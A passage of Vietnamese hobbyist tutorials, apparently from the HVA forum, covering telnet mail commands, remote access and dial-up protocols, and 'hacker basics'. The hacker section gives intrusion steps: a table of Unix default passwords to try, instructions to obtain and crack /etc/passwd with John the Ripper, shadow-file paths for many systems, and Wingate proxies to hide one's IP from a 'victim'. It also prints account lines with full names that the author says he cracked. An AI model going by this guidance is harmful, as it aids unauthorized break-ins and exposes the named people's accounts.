Nếu những thông tin liệt kê ở trên quá nhiều, bạn không kịp xem, hãy dùng lệnh top <mess number> <showed lines> để liệt kê theo số lượng dòng nhất định

vd: top 1 10 -> sẽ liệt kê 10 dòng đầu (kể cả header) của email số 1, sau khi hiện xong 10 dòng cho bạn xem, chờ vài giây, nó sẽ tiếp tục hiện các dòng kế tiếp cho đến khi toàn bộ email được xem!?

Ðể xóa 1 email, bạn dùng lệnh dele <email number>

vd: dele 2 -> sẽ xóa email thứ 2 trong danh sách

Sau khi check xong emails, bạn đóng telnet session bằng lệnh QUIT, bạn sẽ được đưa về dấu nhắc lệnh

Bất lợi của việc check email POP dùng telnet là bạn không có được giao diện dễ nhìn như các trình check POP mail khác. Bạn cũng không thể trả lời từ các mail đã đọc được.

b- Gửi mail

Tương tự như trên, các internet mail server sẽ cung cấp một giao thức là SMTP (Simple Mail Transfer Protocol) cho phép bạn send email thông qua server đó, cổng 25.

Một số lệnh bạn cần dùng:

HELO <hostname> : giới thiệu host, thông tin này không cần thiết

MAIL FROM: <email của người gửi>

RCPT TO: <emails của người nhận>

DATA <nhập data của bạn>: sau khi enter, bạn nhập nội dung email. Sau khi nhập xong, muốn kết thúc, bạn phải xuống hàng và nhập dấu chấm '.'

RSET xóa các thông tin lần gửi mới nhất, dùng khi bạn muốn gửi đến một người khác

QUIT : thoát

HELP <lệnh> xem trợ giúp về các lệnh, lệnh này tùy thuộc vào mail server bạn đang connect

Ví dụ, đối với yahoo:

Bạn thực hiện lệnh telnet smtp.mail.yahoo.com 25

Chờ một lúc, nếu kết nối thành công, bạn sẽ nhận được thông tin sau:

220 smtp011.mail.yahoo.com ESMTP

Kết nối:

helo smtp.mail.yahoo.com

250 smtp011.mail.yahoo.com

Nhập thông tin người gửi:

mail from: [email protected]

250 ok

Nhập thông tin người nhận:

rcpt to: [email protected] yen ruoi

250 ok

Nhập nội dung:

data blsdfsdfsd

354 go ahead

Subject: hen chat !

Hi em,

em co khoe khong ?

hom nay len chat voi anh nhe !

hen gap...

tungxeng

.

250 ok 1010373599 qp 48077

Ðóng telnet session

Quit

Bạn có thể thao khảo một vd về send mail thông qua SMTP tại:

http://k.domaindlx.com/clairsang/www.kbcafe.com/articles/smtp.html

ps: các ví dụ trên đã test trên 2k, các bạn có thể thực hiện tương tự trên wins 9x. Tùy mail server mà các thông tin xác nhận và thông báo các lệnh của bạn có thể khác nhau.

Đôi nét về Remote Networking :

REMOTE CONTROL

Khi người sử dụng cần truy cập các ứng dụng hoặc các file từ một vị trí ở xa thì bạn sẽ cài đặt 1 phần mềm hỗ trợ truy cập từ xa (remote control software) như PCAnywhere của Symantech , hoặc Reachout (hổng nhớ của hãng nào) or Laplink củaTraveling Software (không biết đúng không nữa) trên cả máy Desktop và Laptop của người này . VÀ bạn hướng dẫn cho người này cài đặt máy của anh ta ở chế độ chờ trước khi đi (đi du lịch or công tác chẳng hạn), và trên đường đi thì anh ta muốn đọc bất cứ dữ liệu gì trên máy của mình từ một máy desktop (laptop) ở ngoài thì chỉ cần quay số đến máy tính để ở nhà , rồi sau đó trên màn hình của máy tính đang làm việc của anh ta sẽ xuất hiện một giao diện cho phép anh ta access database từ máy ở nhà . Khi làm việc xong thì chỉ cần ngắt đường truyền là xong .

Cái ý tưởng hay ho này xuất phát từ việc muốn chạy các ứng dụng (application) phải phụ thuộc vào server . Các ứng dụng này không thể nạp vào ổ cứng của laptop (lúc này là thời Bảo Đại mặc quần xà lỏn nên dung lượng của laptop hơi bi nhỏ) . Hơn nữa các laptop cũng chưa đủ mạnh để chạy các ứng dụng này dù dung lượng đĩa có được cải thiện hơn , vì thế trong giai đoạn đầu của remote control networking technique , user chỉ có thể thấy được desktop screen trên laptop chứ không thực sự chạy được ứng dụng _ không thể lưu dữ kiệu vào máy laptop khi truy cập từ xa cũng như bất cứ công việc gì ngoài thao tác kết nối

Các ứng dụng hỗ trợ truy cập từ xa vẫn được sử dụng cho các ứng dụng trong đó việc gởi một hình ảnh của màn hình có hiệu quả hơn gửi dữ liệu trên mạng ĐT .

REMOTE NODE

Khi máy lapop phát triển và internet trở nên phổ biến cùng với bộ nghi thức TCP/IP thì kỹ thuật truy cập từ xa mới cũng ra đời là REMOTE_NODE . Trong remote_node , máy laptop sử dụng chuẩn TCP/IP để kết nối mạng thông qua 1 tuyến ĐT , khi đó laptop trở thành 1 CLIENT giống như bất cứ 1 client nào khác trong mạng (Đó là nói chung chung thôi vì thiệt ra 1 client trong LAN có thể truy cập database với tốc độ cỡ 10 megabit / s or nhanh hơn , nhưng với 1 laptop trong remote_node thì chỉ có thể truy cập từ 28.8 đến 33.6 kilobit/s do sử dụng mạng ĐT) .

Remote_node có nhiều cải tiến hơn thằng remote_control : trong remote_control bạn chỉ thấy 1 cái màn hình vô tri vô giác vừa câm vừa điếc - do đó bạn không thể thực hiện điều gì thực sự trên laptop . Còn trên remote_node thì bạn đã thực sự kết nối với mạng . Nghĩa là mặc dầu tốc độ truy cập không thay đổi nhưng bạn có thể viết email or soạn văn bản rồi gửi đi khi kết nối với telephone line .

Vấn đề ở trong remote_node chính là các ứng dụng đã được cài sẵn lên laptop và chỉ có dữ liệu được truyền đi chứ không phải kèm theo cả phần mềm ứng dụng . Và vì dữ liệu được truyền trên mạng ĐT giống như trong mạng nên người sử dụng có thể lưu dữ liệu trên máy laptop . Điều này có ý nghĩ ra sao chắc mọi người đều hiểu . Rõ ràng là remot node hiệu quả hơn remote control nhiều . Các kết nối trong remote node tuân theo các chuẩn internet , do đó đảm bảo laptop của bạn có thể kết nối bất kỳ server nào có cùng nghi thức .

CÁC YÊU CẦU TRONG KỸ THUẬT TRUY CẬP TỪ XA

MODEM

Modem (modulate_demodulate) là thiết bị nhận các tín hiệu số từ cổng serial của computer và chuyển thành tín hiệu loại analog or tín hiệu âm thanh - là những dạng thông tin có thể truyền được trên tuyến ĐT bình thường . Ở đầu kia của kết nối là 1 modem khác sẽ biến các tín hiệu analog thành tín hiệu số ( digital ) để máy tính bên nhận có thể hiểu và xử lý được . Hehe , đến đậy thì có lẽ bạn sẽ thắc mắc rằng tại sao lại phải dùng đến modem mà không truyền trực tiếp tín hiệu dưới dạng số ? Tui chỉ có thể trả lời rằng đừơng ĐT dùng cable xoắn đôi chỉ có thể truyền tín hiệu analog .

Modem được xem như là giải pháp để thay thế cho việc dùng các tuyến cable digital đắt tiền . tốc độ ban đầu của modem là 300 bit/s (không thể tưởng tượng nổi) cho đến giờ thì đã cải thiện lên 56kb/s) . Mặc dù modem không thục sự hiệu quả do nó phải dùng 1 phần lớn dữ liệu kênh truyền để phát hiện và chỉnh sửa các lỗi đường truyền nên chiếm 1 lượng khá lớng dung lượng kênh truyền . Nhưng đây là cách thông dụng nhất để connect vào mạng .

ISDN terminal Adapters

ISDN Terminal Adpter là các thiết bị dùng kết nối với các tuyến ĐT số BRI (128 K) . Khác với modem , các thiết bị này không nối trực tiếp vào cống serial của máy tính mà dựa trên kiểu kết nối Ethernet . Mỗi máy tính đều được gắn 1 card mạng ( network adapter ) , và card mạng này nối máy tính với ISDN device = 1 loại cable đặc biệt là crossover cable , với loại cable này thì Hub không cần có mặt trong hệ thống .

Khi 1 computer cần sử dụng Resource trên mạng thì nó gởi các packet dữ liệu đến 1 LAN thành phần . Khi các packet này được truyền đến ISDN device , các thiết bị này sẽ quay số ISDN của mạng chính và người sử dụng có thể kết nối rất nhanh chỉ khoảng vài s với tốc độ rất cao .

CÁC NGHI THỨC MẠNG

Phần lớn các nghi thức được sửa dụng trong hiện tại đều là thành viện của bộ nghi thức TCP/IP , trong đó có 2 nghi thức đặc biệt là PPP và SLIP

+ PPP (Point-to-Point Protocol)

PPP là nghi thức được sử dụng nhiều nhất hiện nay trong số các nghi thức truyền dữ liệu trên tuyến ĐT . PPP sử dụng cho các máy tinh dùng modem hay card ISDN để truy cập thông tin trên mạng . PPP là 1 nghi thức chuẩn của Internet .

PPP đòi hỏi 1 số yêu cầu sau :

_ Số ĐT của hệ thống sẽ kết nối .

_ Địa chỉ DNS (Domain Name Server) . Các dịch vụ DNS rất quan trọng vì các server DNS sẽ cung cấp 1 bảng tham chiếu cho phép 1 máy tính hiểu được 1 địa chỉ IP (ví dụ 205.139.3.200 tượng ứng với www.zero-velocity.com) . Nhờ đó user sẽ dễ dàng hơn nhiều trong việc nhớ các địa chỉ mạng theo tên thông thường thay cho 1 dãy số vô nghĩa .

_ Hoặc là máy truy cập từ xa có 1 địa chỉ IP cố định or sẽ được gán 1 địa chỉ IP động khi kết nối với server . Các địa chỉ IP được cấp phát nhờ vào nghi thức DHCP (dynamic host configuration protocol) - là 1 thành phần của bộ TCP/IP do sever thực hiện .

Khi tất cả các tham số được cung cấp đầy đủ thì hệ thống thực hioện quay số để kết nối . Khi quay số đến server sử dụng nghi thức PPP , bạn sẽ được 1 yêu cầu nhập ID và password , sau khi nhập xong , hệ thống sẽ xác nhận yêu cầu login của bạn và chuyển cho các chương trình xử lý trong PPP , sau khi thao tác login được chấp nhận thì quá trình truy cập mạng bắt đầu . PPP là 1 nghi thức rất đáng tin cậy . Nếu đường truyền còn trống thì PPP sẽ không tự động ngắt kết nối trứ khi sau 1 khoảng thời gian nhất định mà hoàn toàn không có ai truy cập .

+ SLIP (Serial Line Internet Protocol)

SLIP là nghi thức ra đờ trước cả PPP và sử dụng nhiều tham số hơn nhưng độ tin cập lại kém hôn , đồng thời kích thước tối đa của packet dữ liệu phải được thống nhất giữ 2 đầu kết nối trước khi truyền dữ liệu . Nói chung SLIP đang được thay thế dần bởi PPP .

TÓM LẠI :

+Remote controle là cái gì ?

Là phương phap để truy cập từ xa , trong đo người sử dụng ở 1 máy tính từ xa có thể truy cập đến màn hình của máy chủ hoặc desktop tương ứng bằng phương pháp quay số . ReachOut , pcAnywhere , Laplink ... là cá phần mềm truy cập quản lý từ xa .

+Remote node là cái gì ?

Trong thực tế , là một kết nối mạgn d89ược thực hiện thông qua 1 tuyến ĐT hơn là qua cáp mạng .

+Cácnghi thức được sử dụng phổ biến nhất trong remote node ?

Là PPP và SLIP .

+ Các nghi thức nào có thể chạy đồng thời trên 1 tuyến remote node ?

TCP/IP , NetBEUI , IPX có thể chạy đồng thờ trên 1 tuyến remote node . tuy nhiên giải pháp này có thể dẫn đấn hiện tượng là broadcast storms ( nghẽ đường truyền ).

Những hiểu biết cơ bản nhất để trở thành Hacker

( p1)

1 . ) Ta cần những gì để bắt đầu ?

Có thể nhiều bạn không đồng ý với tôi nhưng cách tốt nhất để thực tập

là các bạn hãy dùng HĐH Window 9X , rồI đến các cái khác mạnh hơn đó là Linux

hoặc Unix , dướI đây là những cái bạn cần có :

+ Một cái OS ( có thể là DOS , Window 9X , Linux , Unit ….)

+ Một cái trang Web tốt ( HVA chẳng hạn hi'hi' )

+ Một bộ trình duyệt mạng tốt ( là Nescape , IE , nhưng tốt nhất có lẽ là

Gozzila )

+ Một công cụ chat tốt ( mIRC ,Yahoo Mass …..)

+ Telnet ( hoặc những cái tương tự như nmap …)

+ Cái quan trọng nhất mà bất cứ ai muốn trở thành một hacker là đều phảI có

một chút kiến thức về lập trình ( C , C++ , Visual Basic , Pert …..)

2 . ) Thế nào là một địa chỉ IP ?

_ Địa chỉ IP được chia thành 4 số giới hạn từ 0 - 255. Mỗi số được lưu

bởi 1 byte -> !P có kicks thước là 4byte, được chia thành các lớp địa chỉ. Có

3 lớp là A, B, và C. Nếu ở lớp A, ta sẽ có thể có 16 triệu điạ chỉ, ở

lớp B có 65536 địa chỉ. Ví dụ: Ở lớp B với 132.25,chúng ta có tất cả các

địa chỉ từ 132.25.0.0 đến 132.25.255.255. Phần lớn các địa chỉ ở lớp A llà

sở hữu của các công ty hay của tổ chức. Một ISP thường sở hữu một vài

địa chỉ lớp B hoặc C. Ví dụ: Nếu địa chỉ IP của bạn là 132.25.23.24 thì

bạn có thể xác định ISP của bạn là ai. ( có IP là 132.25.x.)

_ IP là từ viết tắt của Internet Protocol, trên Internet thì địa chỉ IP của mỗI

người là duy nhất và nó sẽ đạI diện cho chính ngườI đó, địa chỉ IP

được sử dụng bởi các máy tính khác nhau để nhận biết các máy tính kết

nối giữa chúng. Đây là lí do tại sao bạn lại bị IRC cấm, và là cách người

ta tìm ra IP của bạn.

Địa chỉ IP có thể dễ dàng phát hiện ra, người ta có thể lấy được qua các

cách sau :

+ bạn lướt qua một trang web, IP của bạn bị ghi lại

+ trên IRC, bất kì ai cũng có thể có IP của bạn

+ trên ICQ, mọi người có thể biết IP của bạn, thậm chí bạn chọn "do not show

ip" người ta vẫn lấy được nó

+ nếu bạn kết nối với một ai đó, họ có thế gõ "systat –n ", và biết

được ai đang kết nối đên họ

+ nếu ai đó gửi cho bạn một email với một đoạn mã java tóm IP, họ cũng có

thể tóm được IP của bạn

( Tài liệu của HVA )

3 . ) Làm thế nào để biết được địa chỉ IP của mình ?

_ Trong Window : vào Start èRun đánh lệnh “winipcfg” .

_ Trong mIRC : kết nốI đến máy chủ sau đó đánh lệnh “/dns <your nick>”

_ Thông qua một số trang Web có hiển thị IP .

4 . ) IP Spoofing là gì ?

_ Một số IP có mục đích để xác định một thiết bị duy nhất trên thế

giới. Vì vậy trên mạng một máy chủ có thể cho phép một thiết bị khác trao

đổi dữ liệu qua lại mà không cần kiểm tra máy chủ.

Tuy nhiên có thể thay đổi IP của bạn, nghĩa là bạn có thể gởi một thông tin

giả đến một máy khác mà máy đó sẽ tin rằng thông tin nhận được xuất phát

từ một máy nào đó (tất nhiên là không phải máy của bạn). Bạn có thể

vượt qua máy chủ mà không cần phải có quyền điều khiến máy chủ đó. Điều

trở ngại là ở chỗ những thông tin phản hồi từ máy chủ sẽ được gởi

đến thiết bị có IP mà chúng ta đã giả mạo. Vì vậy có thể bạn sẽ không

có được sự phản hồi những thông tin mà mình mong muốn. Có lẽ điều duy

nhất mà spoof IP có hiệu quả là khi bạn cần vượt qua firewall, trộm account và

cần dấu thông tin cá nhân!

( Tài liệu của HVA )

5 . ) Trojan / worm / virus / logicbomb là cái gì ?

_ Trojan : Nói cho dễ hiểu thì đây là chương trình điệp viên được cài vào

máy của ngườI khác để ăn cắp nhũng tài liệu trên máy đó gửI về cho chủ

nhân của nó , Cái mà nó ăn cắp có thể là mật khẩu , accourt , hay cookie

………. tuỳ theo ý muốn của ngườI cài nó .

_ virus : Nói cho dễ hiểu thì đây là chương trình vớI những mã đặc biệt

được cài ( hoặc lây lan từ máy khác ) lên máy của nạn nhân và thực hiện

những yêu cầu của mã đó , đa số virut được sử dụng để phá hoạI dữ

liệu hoặc phá hoạI máy tính .

_ worm : Đây là chương trình độc lập có thể tự nhân bản bản thân nó và lây

lan khắp bên trong mạng .Cũng giống như Virut , nó cũng có thể phá hoạI dữ

liệu , hoặc nó có thể phá hoạI bên trong mạng , nhiều khi còn làm down cả mang

đó .

_ logicbomb : Là chương trình gửi một lúc nhiều gói dữ liệu cho cùng một địa

chỉ , làm ngập lụt hệ thống , tắt nghẽn đường truyền ( trên server ) hoặc

dùng làm công cụ để “khủng bố” đốI phương ( bom Mail ) ;) .

6 . ) PGP là gì ?

_ PGP là viết tắt của từ “Pretty Good Privacy” , đây là công cụ sử dụng sự

mã hoá chìa khoá công cộng để bảo vệ những hồ sơ Email và dữ liệu , là

dạng mã hoá an toàn cao sử dụng phần mềm cho MS_DOS , Unix , VAX/VMS và cho những

dạng khác .

7 . ) Proxy là gì ?

_Proxy cung cấp cho người sử dụng truy xuất internet với những host đơn. Những

proxy server phục vụ những nghi thức đặt biệt hoặc một tập những nghi thức

thực thi trên dual_homed host hoặc basion host. Những chương trình client của người

sử dung sẽ qua trung gian proxy server thay thế cho server thật sự mà người sử

dụng cần giao tiếp. Proxy server xác định những yêu cầu từ client và quyết

định đáp ứng hay không đáp ứng, nếu yêu cầu được đáp ứng, proxy server

sẽ kết nối với server thật thay cho client và tiếp tục chuyển tiếp đến

những yêu cầu từ clientđến server, cũng như đáp ứng những yêu cầu của server

đến client. Vì vậy proxy server giống cầu nối trung gian giữa server và client .

_ Proxy cho user truy xuất dịch vụ trên internet theo nghĩa trực tiếp. Với dual host

homed cần phải login vào host trước khi sử dụng dịch vụ nào trên internet.

Điều này thường không tiện lợi, và một số người trể nên thất vọng khi

họ có cảm giác thông qua firewall, với proxy nó giải quyết được vấn đề này.

Tất nhiên nó còn có những giao thức mới nhưng nói chung nó cũng khá tiện lợi

cho user. Bởi vì proxy cho phép user truy xuất những dịch vụ trên internet từ hệ

thống cá nhân của họ, vì vậy nó không cho phép packet đi trực tiếp giữa hệ

thống sử dụng và internet. đường đi là giáng tiếp thông qua dual homed host hoặc

thông qua sự kết hợp giữa bastion host và screening rounter.

( Bài viết của Z3RON3 – tài liệu của HVA )

8 . ) Unix là gì ?

_ Unix là một hệ điều hành ( giống Window ) .Nó hiện là hệ điều hành mạnh

nhất , và thân thiết với các Hacker nhất . Nếu bạn đã trở thành một hacker

thật sự thì HĐH này không thể thiếu đốI vớI bạn . Nó được sử dụng lập

trình ngôn ngữ C .

9 . ) Telnet là gì ?

_ Telnet là một chương trình cho phép ta kết nốI đến máy khác thông qua cổng (

port ) . MọI máy tính hoặc máy chủ ( server ) đều có cổng , sau đây là một số

cổng thông dụng :

+ Port 21: FTP

+ Port 23: Telnet

+ Port 25: SMTP (Mail)

+ Port 37: Time

+ Port 43: Whois

_ Ví dụ : bạn có thể gọI Telnet để kết nốI đến mail.virgin.net trên port 25

.

10 . ) Làm thế nào để biết mình đã Telnet đến hệ thống Unix ?

_ Ok , tôi sẽ nói cho bạn biết làm sao một hệ thống Unix có thể chào hỏI bạn

khi bạn kết nối tới nó . Đầu tiên , khi bạn gọi Unix , thông thường nó sẽ

xuất hiện một dấu nhắc : “ Log in : ” , ( tuy nhiên , chỉ với như vậy thì

cũng chưa chắc chắn đây là Unix được ngoạI trừ chúng xuất hiện thông báo

ở trước chữ “ log in :” như ví dụ : Welcome to SHUnix. Please log in ….)

Bây giờ ta đang ở tạI dấu nhắc “log in” , bạn cần phảI nhập vào một

account hợp lệ . Một account thông thường gồm có 8 đặc tính hoặc hơn , sau khi

bạn nhập account vào , bạn sẽ thấy có một mật khẩu , bạn hãy thử nhập

Default Password thử theo bảng sau :

Account-------------------------Default Password

Root-----------------------------------------------Root

Sys------------------------------------------------Sys / System / Bin

Bin-------------------------------------------------Sys / Bin

Mountfsy------------------------------------------Mountfsys

Nuuc-----------------------------------------------Anon

Anon-----------------------------------------------Anon

User------------------------------------------------User

Games---------------------------------------------Games

Install----------------------------------------------Install

Demo-----------------------------------------------Demo

Guest----------------------------------------------Guest

11 . ) shell account là cái gì ?

_ Một shell account cho phép bạn sử dụng máy tính ở nhà bạn như thiết bị

đầu cuốI ( terminal ) mà vớI nó bạn có thể đánh lệnh đến một máy tính

đang chạy Unix , “Shell” là chương trình có nhiệm vụ dịch những ký tự của

bạn gửi đến rồI đưa vào thực hiện lệnh của chương trình Unix . VớI một

shell account chính xác bạn có thể sử dụng được một trạm làm việc mạnh hơn

nhiều so vớI cái mà bạn có thể tưởng tượng đến được .

Bạn có thể lấy được “shell account” miễn phí tạI trang Web www.freeshell.com

tuy nhiên bạn sẽ không sử dụng được “telnet” cho đến khi bạn trả tiền

cho nó .

12 . ) Làm cách nào để bạn có thể crack Unix account passwords ?

_ Rất đơn giản , tuy nhiên cách mà tôi nói vớI các bạn ở đây “lạc hậu”

rồI , các bạn có thể crack được chúng nếu các bạn may mắn , còn không thì

các bạn đọc để tham khảo .

_ Đầu tiên bạn hãy đăng nhập vào hệ thống có sử dụng Unix như một khách

hàng hoặc một ngườI khách ghé thăm , nếu may mắn bạn sẽ lấy được mật

khẩu được cất dấu trong những hệ thống chuẩn như :

/etc/passwd

mỗi hàng trong một hồ sơ passwd có một tài khoản khác nhau , nó giống như hàng

này :

userid:password:userid#:groupid#:GECOS field:home dir:shell

trong đó :

+ userid = the user id name : tên đăng nhập : có thể là một tên hoặc một số .

+ password : mật mã . Dùng để làm gì hẳn các bạn cũng biết rồI .

+ userid# : là một số duy nhất đựơc thông báo cho ngườI đăng ký khi họ đăng

ký mớI ở lần đầu tiên .

+ groupid# : tương tự như userid# , nhưng nó được dùng cho những ngườI đang ở

trong nhóm nào đó ( như nhóm Hunter Buq của HVA chẳng hạn )

+ GECOS FIELD : đây là nơi chứa thông tin cho ngườI sử dụng , trong đó có họ

tên đầy đủ , số điện thoại , địa chỉ v.v…. . Đây cũng là nguồn tốt

để ta dễ dàng crack một mật khẩu .

+ home dir : là thư mục ghi lạI hoạt động của người khách khi họ ghé thăm (

giống như mục History trong IE vậy )

+ Shell : đây là tên của shell mà nó tự động bắt đầu khi ta login .

_ Hãy lấy file password , lấy file text đã mã hoá về , sau đó bạn dùng chương

trình "CrackerJack" hoặc "John the Ripper" để crack .

_ Các bạn thấy cũng khá dễ phảI không ? Sai bét , không dễ dàng và may mắn

để bạn có thể crack được vì hầu hết bây giờ họ cất rất kỹ , hãy đọc

tiếp bạn sẽ thấy khó khăn chỗ nào .

13 . ) shadowed password là cái gì ?

_ Một shadowed password được biết đến là trong file Unix passwd , khi bạn nhập

một mật khẩu , thì ngườI khác chỉ thấy được trình đơn của nó ( như ký

hiệu “ X ” hoặc “ * ” ) . Cái này thông báo cho bạn biết là file passwd đã

được cất giữ ở nơi khác , nơi mà một ngườI sử dụng bình thường không

thể đến được . Không lẽ ta đành bó tay , dĩ nhiên là đốI vớI một hacker

thì không rùi , ta không đến được trực tiếp file shadowed password thì ta hãy tìm

file sao lưu của nó , đó là file Unshadowed .

Những file này trên hệ thống của Unix không cố định , bạn hãy thử vớI lần

lượt những đường dẫn sau :

AIX 3 /etc/security/passwd !

or /tcb/auth/files/<first letter #of username>/<username>

A/UX 3.0s /tcb/files/auth/?/ *

BSD4.3-Reno /etc/master.passwd *

ConvexOS 10 /etc/shadpw *

ConvexOS 11 /etc/shadow *

DG/UX /etc/tcb/aa/user/ *

EP/IX /etc/shadow x

HP-UX /.secure/etc/passwd *

IRIX 5 /etc/shadow x

Linux 1.1 /etc/shadow *

OSF/1 /etc/passwd[.dir|.pag] *

SCO Unix #.2.x /tcb/auth/files/<first letter *of username>/<username>

SunOS4.1+c2 /etc/security/passwd.adjunct =##username

SunOS 5.0 /etc/shadow

<optional NIS+ private secure

maps/tables/whatever>

System V Release 4.0 /etc/shadow x

System V Release 4.2 /etc/security/* database

Ultrix 4 /etc/auth[.dir|.pag] *

UNICOS /etc/udb =20

Trước dấu “ / ”đầu tiên của một hàng là tên của hệ thống tương ứng ,

hãy căn cứ vào hệ thông thật sự bạn muốn lấy rồI lần theo đường dẫn

phía sau dấu “/”đầu tiên .

Và cuốI cùng là những account passwd mà tôi từng crack được , có thể bây giờ

nó đã hết hiệu lực rồI :

arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh

arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh

aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh

armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh

arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh

arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh

aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh

arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash

arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh

Để bảo đảm sự bí mật nên pass của họ tôi xoá đi và để vào đó là ký

hiệu “ x ” , các bạn hãy tìm hiểu thông tin có được từ chúng xem .

14 . ) Vitual port là gì ?

_ Vitual port ( cổng ảo ) là 1 số tự nhiên đựợc gói ở trong TCP(Tranmission

Control Protocol) và UDP(User Diagram Protocol) header. Như mọi nguòi đã biết, Windows có

thể chạy nhiều chương trình 1 lúc, mỗi chương trình này có 1 cổng riêng dùng

để truyền và nhận dữ liệu. Ví dụ 1 máy có địa chỉ IP là 127.0.0.1 chạy

WebServer, FTP_Server, POP3 server, etc, những dịch vụ này đều đuọc chạy trên 1 IP

address là 127.0.0.1, khi một gói tin đuọc gửi đến làm thế nào máy tính của

chúng ta phân biệt được gói tin này đi vào dịch vụ nào WebServer hay FTP server

hay SM! TP? Chính vì thế Port xuất hiện. Mỗi dịch vụ có 1 số port mặc định,

ví dụ FTP có port mặc định là 21, web service có port mặc định là 80, POP3 là

110, SMTP là 25 vân vân.... Người quản trị mạng có thể thay đổi số port mặc

định này, nếu bạn ko biết số port trên một máy chủ, bạn ko thể kết nối

vào dịch vụ đó được. Chắc bạn đã từng nghe nói đến PORT MAPPING nhưng có

lẽ chưa biết nó là gì và chức năng thế nào. Port mapping thực ra đơn giản

chỉ là quá trình chuyển đổi số port mặc định của một dịch vụ nào đó

đến 1 số khác. Ví dụ Port mặc định của WebServer là 80, nhưng thỉnh thoảng

có lẽ bạn vẫn thấy http://www.xxx.com:8080 , 8080 ở đây chính là số port của

host xxx nhưng đã đuợc nguòi quản trị của host này "map" từ 80 thành 8080.

( Tài liệu của HVA )

15 . ) DNS là gì ?

_ DNS là viết tắt của Domain Name System. Một máy chủ DNS đợi kết nối ở cổng

số 53, có nghĩa là nếu bạn muốn kết nối vào máy chủ đó, bạn phải kết

nối đến cổng số 53. Máy chủ chạy DNS chuyển hostname bằng các chữ cái thành

các chữ số tương ứng và ngược lại. Ví dụ: 127.0.0.1 --> localhost và

localhost--->127.0.0.1 .

( Tài liệu của HVA )

16 . ) Đôi điều về Wingate :

_ WinGate là một chương trình đơn giản cho phép bạn chia các kết nối ra. Thí

dụ: bạn có thể chia sẻ 1 modem với 2 hoặc nhiều máy . WinGate dùng với nhiều

proxy khác nhau có thể che giấu bạn .

_ Làm sao để Wingate có thể che dấu bạn ? Hãy làm theo tôi : Bạn hãy telnet trên

cổng 23 trên máy chủ chạy WinGate telnet proxy và bạn sẽ có dấu nhắc WinGate > .

Tại dấu nhắc này bạn đánh vào tên server, cùng một khoảng trống và cổng

bạn muốn kết nối vào. VD :

telnet wingate.net

WinGate> victim.com 23

ta telnet đến cổng 23 vì đây là cổng mặc định khi bạn cài Wingate . lúc này IP

trên máy mà victim chộp được của ta là IP của máy chủ chứa Wingate proxy đó

.

_ Làm sao để tìm Wingate ?

+ Nếu bạn muốn tìm IP WinGates tĩnh (IP không đổi) thì đến yahoo hay một trang

tìm kiếm cable modem. Tìm kiếm cable modems vì nhiều người dùng cable modems có

WinGate để họ có thể chia sẻ đường truyền rộng của nó cable modems cho những

máy khác trong cùng một nhà . Hoặc bạn có thể dùng Port hay Domain scanners và scan

Port 1080 .

+ Để tìm IP động (IP thay đổi mỗi lần user kết nối vào internet) của WinGates

bạn có thể dùng Domscan hoặc các chương trình quét khác . Nếu dùng Domscan bạn

hãy nhập khoảng IP bất kỳ vào box đầu tiên và số 23 vào box thứ 2 . Khi đã

có kết quả , bạn hãy thử lần lượt telnet đến các địa chỉ IP tìm đựơc (

đã hướng dẫn ở trên ), nếu nó xuất hiện dấu “Wingate >” thì bạn đã tìm

đúng máy đang sử dụng Wingate rồI đó .

+ Theo kinh nghiệm của tôi thì bạn hãy down wingatescanner về mà sài , nó có rất

nhièu trên mạng .

17 . ) Đôi điều về Traceroute :

_ Traceroute là một chương trình cho phép bạn xác định được đường đi của

các gói packets từ máy bạn đến hệ thống đích trên mạng Internet.

_ bạn hãy xem VD sau :

C:\windows>tracert 203.94.12.54

Tracing route to 203.94.12.54 over a maximum of 30 hops

1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms

2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms

3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms

4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms

5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms

6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms

7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms

8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms

9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms

10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms

11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms

12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms

13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms

Tôi cần biết đường đi từ máy tôi đến một host trên mạng Internet có địa

chỉ ip là 203.94.12.54. Tôi cần phải tracert đến nó! Như bạn thấy ở trên, các

gói packets từ máy tôi muốn đến được 203.94.12.54 phải đi qua 13 hops(mắc xích)

trên mạng. Đây là đưòng đi của các gói packets .

_ Bạn hãy xem VD tiếp theo :

host2 # traceroute xyz.com

traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets

1 isp.net (202.xy.34.12) 20ms 10ms 10ms

2 xyz.com (202.xx.12.34) 130ms 130ms 130ms

+ Dòng đầu tiên cho biết hostname và địa chỉ IP của hệ thống đích. Dòng này

còn cho chúng ta biết thêm giá trị TTL<=30 và kích thước của datagram là 40

bytes(20-bytes IP Header + 8-bytes UDP Header + 12-bytes user data).

+ Dòng thứ 2 cho biết router đầu tiên nhận được datagram là 202.xy.34.12, giá

trị của TTL khi gởi đến router này là 1.

Router này sẽ gởi trở lại cho chương

trình traceroute một ICMP message error "Time Exceeded". Traceroute sẽ gởi tiếp một

datagram đến hệ thống đích.

+ Dòng thứ 3, xyz.com(202.xx.12.34) nhận được datagram có TTL=1(router thứ nhất đã

giảm một trước đó - TTL=2-1=1). Tuy nhiên, xyz.com không phải là một router, nó

sẽ gởi trở lại cho traceroute một ICMP error message "Port Unreachable". Khi nhận

